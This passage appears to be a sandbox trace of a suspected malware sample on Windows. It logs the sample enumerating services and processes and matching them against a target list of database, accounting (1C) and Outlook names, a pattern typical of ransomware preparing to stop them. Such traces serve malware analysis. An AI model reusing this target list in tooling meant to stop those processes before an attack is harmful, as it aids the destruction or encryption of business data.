	[0036.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0036.064] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0036.065] lstrlenW (lpString="DPS") returned 3
	[0036.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0036.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0036.065] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0036.065] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0036.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0036.065] lstrlenW (lpString="eventlog") returned 8
	[0036.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0036.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0036.065] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0036.065] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0036.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0036.065] lstrlenW (lpString="EventSystem") returned 11
	[0036.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0036.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0036.065] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0036.065] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0036.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0036.065] lstrlenW (lpString="gpsvc") returned 5
	[0036.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0036.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0036.065] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0036.065] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0036.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0036.065] lstrlenW (lpString="iphlpsvc") returned 8
	[0036.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0036.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0036.065] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0036.065] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0036.065] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0036.065] lstrlenW (lpString="LanmanServer") returned 12
	[0036.065] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0036.065] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0036.065] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0036.065] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0036.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0036.066] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0036.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0036.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0036.066] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0036.066] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0036.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0036.066] lstrlenW (lpString="lmhosts") returned 7
	[0036.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0036.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0036.066] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0036.066] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0036.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0036.066] lstrlenW (lpString="MMCSS") returned 5
	[0036.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0036.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0036.066] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0036.066] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0036.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0036.066] lstrlenW (lpString="MpsSvc") returned 6
	[0036.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0036.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0036.066] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0036.066] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0036.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0036.066] lstrlenW (lpString="Netman") returned 6
	[0036.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0036.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0036.066] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0036.066] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0036.066] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0036.066] lstrlenW (lpString="netprofm") returned 8
	[0036.066] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0036.066] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0036.067] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0036.067] lstrlenW (lpString="NlaSvc") returned 6
	[0036.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0036.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0036.067] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0036.067] lstrlenW (lpString="nsi") returned 3
	[0036.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0036.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0036.067] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0036.067] lstrlenW (lpString="PcaSvc") returned 6
	[0036.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0036.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0036.067] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0036.067] lstrlenW (lpString="PlugPlay") returned 8
	[0036.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0036.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0036.067] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0036.067] lstrlenW (lpString="Power") returned 5
	[0036.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0036.067] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0036.067] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0036.067] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0036.067] lstrlenW (lpString="ProfSvc") returned 7
	[0036.067] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0036.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0036.068] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0036.068] lstrlenW (lpString="RpcEptMapper") returned 12
	[0036.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0036.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0036.068] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0036.068] lstrlenW (lpString="RpcSs") returned 5
	[0036.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0036.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0036.068] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0036.068] lstrlenW (lpString="SamSs") returned 5
	[0036.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0036.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0036.068] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0036.068] lstrlenW (lpString="Schedule") returned 8
	[0036.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0036.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0036.068] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0036.068] lstrlenW (lpString="SENS") returned 4
	[0036.068] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0036.068] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0036.068] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0036.068] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0036.068] lstrlenW (lpString="ShellHWDetection") returned 16
	[0036.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0036.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0036.069] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0036.069] lstrlenW (lpString="Spooler") returned 7
	[0036.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0036.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0036.069] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0036.069] lstrlenW (lpString="SysMain") returned 7
	[0036.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0036.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0036.069] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0036.069] lstrlenW (lpString="Themes") returned 6
	[0036.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0036.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0036.069] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0036.069] lstrlenW (lpString="TrkWks") returned 6
	[0036.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0036.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0036.069] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0036.069] lstrlenW (lpString="UxSms") returned 5
	[0036.069] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0036.069] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0036.069] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0036.069] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0036.070] lstrlenW (lpString="WdiServiceHost") returned 14
	[0036.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0036.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0036.070] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0036.070] lstrlenW (lpString="WdiSystemHost") returned 13
	[0036.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0036.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0036.070] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0036.070] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0036.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0036.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0036.070] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0036.070] lstrlenW (lpString="Winmgmt") returned 7
	[0036.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0036.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0036.070] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0036.070] lstrlenW (lpString="WPDBusEnum") returned 10
	[0036.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0036.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0036.070] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0036.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0036.070] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7e5ca88 | out: hHeap=0x7d60000) returned 1
	[0036.070] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a8
	[0036.073] Process32FirstW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0036.073] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0036.074] lstrlenW (lpString="System") returned 6
	[0036.074] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0036.074] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0036.074] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0036.074] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0036.074] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0036.074] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0036.074] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0036.074] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0036.074] lstrlenW (lpString="smss.exe") returned 8
	[0036.074] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0036.074] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0036.075] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0036.075] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0036.075] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0036.075] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0036.075] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0036.075] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0036.075] lstrlenW (lpString="csrss.exe") returned 9
	[0036.075] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0036.075] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0036.075] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0036.075] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0036.075] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0036.075] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0036.075] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0036.075] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0036.076] lstrlenW (lpString="wininit.exe") returned 11
	[0036.076] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0036.076] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0036.076] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0036.076] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0036.076] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0036.076] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0036.076] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0036.076] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0036.076] lstrlenW (lpString="csrss.exe") returned 9
	[0036.076] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0036.076] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0036.076] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0036.076] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0036.076] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0036.077] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0036.077] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0036.077] lstrlenW (lpString="winlogon.exe") returned 12
	[0036.077] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0036.078] lstrlenW (lpString="services.exe") returned 12
	[0036.078] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0036.078] lstrlenW (lpString="lsass.exe") returned 9
	[0036.078] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0036.078] lstrlenW (lpString="lsm.exe") returned 7
	[0036.079] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0036.079] lstrlenW (lpString="svchost.exe") returned 11
	[0036.079] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0036.079] lstrlenW (lpString="svchost.exe") returned 11
	[0036.079] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0036.080] lstrlenW (lpString="svchost.exe") returned 11
	[0036.080] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0036.080] lstrlenW (lpString="svchost.exe") returned 11
	[0036.080] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0036.081] lstrlenW (lpString="svchost.exe") returned 11
	[0036.081] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0036.081] lstrlenW (lpString="audiodg.exe") returned 11
	[0036.081] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0036.082] lstrlenW (lpString="svchost.exe") returned 11
	[0036.082] Process32NextW (in: hSnapshot=0x1a8, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0036.082] lstrlenW (lpString="svchost.exe") returned 11
